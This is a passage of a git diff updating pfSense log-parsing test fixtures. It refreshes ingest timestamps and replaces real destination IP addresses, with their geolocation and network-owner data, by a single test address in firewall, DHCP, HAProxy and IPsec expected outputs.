"ingested": "2021-09-14T22:09:18.385381654Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709469200Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,40620,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56578,853,0,S,3864182524,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1035,23 +1041,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1061,12 +1069,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:NUrMaRq0JfKde00qO8PW2llVUx8=", + "community_id": "1:bR7oo0ti5ImuczW3EAgomPxyvPc=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1110,14 +1118,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385384183Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709476400Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25977,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1140,23 +1148,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1166,12 +1176,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:sHss/MZhCpIXxOfJoM05khzrJ4k=", + "community_id": "1:tVSUn9UzCrzCUQ+t4rluKGR9bZg=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1215,14 +1225,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385386938Z", - "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709486200Z", + "original": "\u003c134\u003eJul 3 19:10:32 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12618,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1245,23 +1255,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1271,12 +1283,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:xlLE3ZSINevHQXM3p8RQ9KDr+1Q=", + "community_id": "1:rQmykACxQVu8Qt8eiPX4LilGkuQ=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1320,14 +1332,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385389503Z", - "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709495100Z", + "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,11515,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49710,853,0,S,3494229132,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1350,23 +1362,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1376,12 +1390,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EC0g7QhIlimvv+wydJFXKh3INt4=", + "community_id": "1:zOjPnHE+Tjfyak9LxE+IgjCB5GM=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1425,14 +1439,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385392232Z", - "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709502700Z", + "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1512,7 +1526,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385394769Z", + "ingested": "2021-12-09T13:44:35.709509100Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0x0,,64,29691,0,DF,17,udp,78,10.170.27.41,10.170.27.255,137,137,58", "provider": "filterlog", "timezone": "-04:00", @@ -1536,23 +1550,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" @@ -1562,12 +1578,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:NUrMaRq0JfKde00qO8PW2llVUx8=", + "community_id": "1:bR7oo0ti5ImuczW3EAgomPxyvPc=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1611,14 +1627,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385397270Z", - "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709515400Z", + "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1640,8 +1656,25 @@ } }, "destination": { - "address": "239.255.255.250", - "ip": "239.255.255.250" + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "id": "1557957510" @@ -1650,12 +1683,12 @@ "address": "10.170.12.17", "ip": "10.170.12.17" }, - "message": "199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,239.255.255.250,datalength=8", + "message": "199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:HgWBHt8msizUwObP4paAJzvwJFA=", + "community_id": "1:LdbmIdVyI4RYGCjX644CYvLBhdE=", "bytes": 32, "transport": "igmp", "type": "ipv4", @@ -1688,14 +1721,14 @@ }, "related": { "ip": [ - "239.255.255.250", + "175.16.199.1", "10.170.12.17" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385399853Z", - "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,239.255.255.250,datalength=8", + "ingested": "2021-12-09T13:44:35.709521900Z", + "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1718,22 +1751,24 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "142.250.114.105", - "ip": "142.250.114.105" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "id": "1520797901" @@ -1742,12 +1777,12 @@ "address": "10.100.10.30", "ip": "10.100.10.30" }, - "message": "176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,142.250.114.105,request,37728,164", + "message": "176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,175.16.199.1,request,37728,164", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:/QaomA7rGHnGeJ56nHi7eln6R8U=", + "community_id": "1:gfzPY8KpURzu1udgYHkiWhvNozU=", "transport": "icmp", "type": "ipv4", "bytes": 84, @@ -1784,14 +1819,14 @@ }, "related": { "ip": [ - "142.250.114.105", + "175.16.199.1", "10.100.10.30" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385402543Z", - "original": "\u003c134\u003eJul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,142.250.114.105,request,37728,164", + "ingested": "2021-12-09T13:44:35.709528Z", + "original": "\u003c134\u003eJul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,175.16.199.1,request,37728,164", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1871,7 +1906,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385405129Z", + "ingested": "2021-12-09T13:44:35.709534300Z", "original": "\u003c134\u003eJul 4 11:10:54 filterlog[72237]: 199,,,1557957510,igb1.15,match,pass,in,4,0x0,,64,0,0,DF,1,icmp,84,10.100.15.13,10.100.15.1,request,0,064", "provider": "filterlog", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json index eccacd06726..d1a5388bef7 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json @@ -43,7 +43,7 @@ "mac": "4c:55:41:a0:fa:99" }, "event": { - "ingested": "2021-09-14T22:09:19.440156756Z", + "ingested": "2021-12-09T13:44:38.896609700Z", "original": "\u003c190\u003eJul 4 09:39:40 dhcpd[64305]: DHCPDISCOVER from 4c:55:41:a0:fa:99 via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -117,7 +117,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-09-14T22:09:19.440170047Z", + "ingested": "2021-12-09T13:44:38.896618700Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPOFFER on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -197,7 +197,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-09-14T22:09:19.440173663Z", + "ingested": "2021-12-09T13:44:38.896624700Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPREQUEST for 10.150.60.56 (10.150.60.1) from 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -271,7 +271,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-09-14T22:09:19.440176982Z", + "ingested": "2021-12-09T13:44:38.896629Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPACK on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json index 278d6e94444..dae9e7bb277 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json @@ -71,7 +71,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-09-14T22:09:19.585921034Z", + "ingested": "2021-12-09T13:44:39.410311Z", "original": "\u003c134\u003eAug 15 16:15:18 haproxy[41476]: 10.87.93.55:59607 [15/Aug/2021:16:15:18.502] TestFrontend~ TestBackend/TestServer 0/0/0/2/2 400 182 - - ---- 2/2/0/1/0 0/0 \"GET /favicon.ico HTTP/1.1\" ", "provider": "haproxy", "timezone": "-04:00", @@ -153,7 +153,7 @@ }, "event": { "duration": 3000000, - "ingested": "2021-09-14T22:09:19.585934294Z", + "ingested": "2021-12-09T13:44:39.410319600Z", "original": "\u003c134\u003eAug 15 16:17:18 haproxy[41476]: 10.87.93.55:59607 [15/Aug/2021:16:15:18.407] TestFrontend~ TestBackend/TestServer 0/0/0/3/3 400 182 - - ---- 2/2/0/1/0 0/0 \"GET /login HTTP/1.1\" ", "provider": "haproxy", "timezone": "-04:00", @@ -227,7 +227,7 @@ }, "event": { "duration": 30014000000, - "ingested": "2021-09-14T22:09:19.585937789Z", + "ingested": "2021-12-09T13:44:39.410325100Z", "original": "\u003c134\u003eAug 15 16:18:40 haproxy[41476]: 10.87.93.55:58722 [15/Aug/2021:16:15:10.549] TestFrontend~ TestBackend/\u003cNOSRV\u003e -1/-1/-1/-1/30014 408 212 - - cR-- 2/2/0/0/0 0/0 \"\u003cBADREQ\u003e\" ", "provider": "haproxy", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log index c3788265745..d27ff6304e2 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log @@ -22,4 +22,4 @@ <30>1 2021-07-03T23:01:56.547481-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_packets = 0 <30>1 2021-07-03T23:01:56.547485-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_packets = 0 <30>1 2021-07-03T23:01:56.547489-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_packets = 0 -<30>1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] sending packet: from 28.130.181.102[500] to 90.92.7.206[500] (464 bytes) +<30>1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes) diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json index 6ffdd84e339..131d6edf6d4 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json @@ -14,7 +14,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816231644Z", + "ingested": "2021-12-09T13:44:39.878248400Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547105-05:00 pfSense.example.com charon 18610 - - 08[CFG] ppk_id = (null)", "provider": "charon", "timezone": "-05:00", @@ -46,7 +46,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816244807Z", + "ingested": "2021-12-09T13:44:39.878257Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547109-05:00 pfSense.example.com charon 18610 - - 08[CFG] ppk_required = 0", "provider": "charon", "timezone": "-05:00", @@ -78,7 +78,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816248434Z", + "ingested": "2021-12-09T13:44:39.878262700Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547113-05:00 pfSense.example.com charon 18610 - - 08[CFG] mobike = 1", "provider": "charon", "timezone": "-05:00", @@ -110,7 +110,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816251785Z", + "ingested": "2021-12-09T13:44:39.878268200Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547117-05:00 pfSense.example.com charon 18610 - - 08[CFG] aggressive = 0", "provider": "charon", "timezone": "-05:00", @@ -142,7 +142,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816255053Z", + "ingested": "2021-12-09T13:44:39.878273600Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547122-05:00 pfSense.example.com charon 18610 - - 08[CFG] dscp = 0x00", "provider": "charon", "timezone": "-05:00", @@ -174,7 +174,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816258293Z", + "ingested": "2021-12-09T13:44:39.878279Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547126-05:00 pfSense.example.com charon 18610 - - 08[CFG] encap = 0", "provider": "charon", "timezone": "-05:00", @@ -206,7 +206,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816267446Z", + "ingested": "2021-12-09T13:44:39.878284400Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547130-05:00 pfSense.example.com charon 18610 - - 08[CFG] dpd_delay = 0", "provider": "charon", "timezone": "-05:00", @@ -238,7 +238,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816270950Z", + "ingested": "2021-12-09T13:44:39.878289900Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547207-05:00 pfSense.example.com charon 18610 - - 08[CFG] if_id_in = 0", "provider": "charon", "timezone": "-05:00", @@ -270,7 +270,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816274398Z", + "ingested": "2021-12-09T13:44:39.878295400Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547211-05:00 pfSense.example.com charon 18610 - - 08[CFG] if_id_out = 0", "provider": "charon", "timezone": "-05:00", @@ -302,7 +302,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816277612Z", + "ingested": "2021-12-09T13:44:39.878300700Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547215-05:00 pfSense.example.com charon 18610 - - 08[CFG] local:", "provider": "charon", "timezone": "-05:00", @@ -334,7 +334,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816280856Z", + "ingested": "2021-12-09T13:44:39.878306Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547220-05:00 pfSense.example.com charon 18610 - - 08[CFG] remote:", "provider": "charon", "timezone": "-05:00", @@ -366,7 +366,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816284498Z", + "ingested": "2021-12-09T13:44:39.878311800Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547245-05:00 pfSense.example.com charon 18610 - - 08[CFG] updated vici connection: bypass", "provider": "charon", "timezone": "-05:00", @@ -398,7 +398,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816287828Z", + "ingested": "2021-12-09T13:44:39.878317300Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547376-05:00 pfSense.example.com charon 18610 - - 07[CFG] vici client 84 requests: load-conn", "provider": "charon", "timezone": "-05:00", @@ -430,7 +430,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816292286Z", + "ingested": "2021-12-09T13:44:39.878322700Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547385-05:00 pfSense.example.com charon 18610 - - 07[CFG] conn con1000:", "provider": "charon", "timezone": "-05:00", @@ -462,7 +462,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816295894Z", + "ingested": "2021-12-09T13:44:39.878328Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547451-05:00 pfSense.example.com charon 18610 - - 07[CFG] child con1000:", "provider": "charon", "timezone": "-05:00", @@ -494,7 +494,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816299150Z", + "ingested": "2021-12-09T13:44:39.878333500Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547457-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_time = 3240", "provider": "charon", "timezone": "-05:00", @@ -526,7 +526,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816302510Z", + "ingested": "2021-12-09T13:44:39.878339Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547461-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_time = 3600", "provider": "charon", "timezone": "-05:00", @@ -558,7 +558,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816305691Z", + "ingested": "2021-12-09T13:44:39.878344400Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547465-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_time = 360", "provider": "charon", "timezone": "-05:00", @@ -590,7 +590,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816308985Z", + "ingested": "2021-12-09T13:44:39.878349800Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547469-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_bytes = 0", "provider": "charon", "timezone": "-05:00", @@ -622,7 +622,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816312220Z", + "ingested": "2021-12-09T13:44:39.878355200Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547473-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_bytes = 0", "provider": "charon", "timezone": "-05:00", @@ -654,7 +654,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816315512Z", + "ingested": "2021-12-09T13:44:39.878360600Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547477-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_bytes = 0", "provider": "charon", "timezone": "-05:00", @@ -686,7 +686,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816321752Z", + "ingested": "2021-12-09T13:44:39.878365900Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547481-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -718,7 +718,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816325097Z", + "ingested": "2021-12-09T13:44:39.878371300Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547485-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -750,7 +750,7 @@ } }, "event": { - "ingested": "2021-09-14T22:09:19.816349366Z", + "ingested": "2021-12-09T13:44:39.878376900Z", "original": "\u003c30\u003e1 2021-07-03T23:01:56.547489-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_packets = 0", "provider": "charon", "timezone": "-05:00", @@ -776,42 +776,49 @@ }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "FR-94", - "city_name": "Maisons-Alfort", - "country_iso_code": "FR", - "country_name": "France", - "region_name": "Val-de-Marne", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 2.4415, - "lat": 48.8096 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 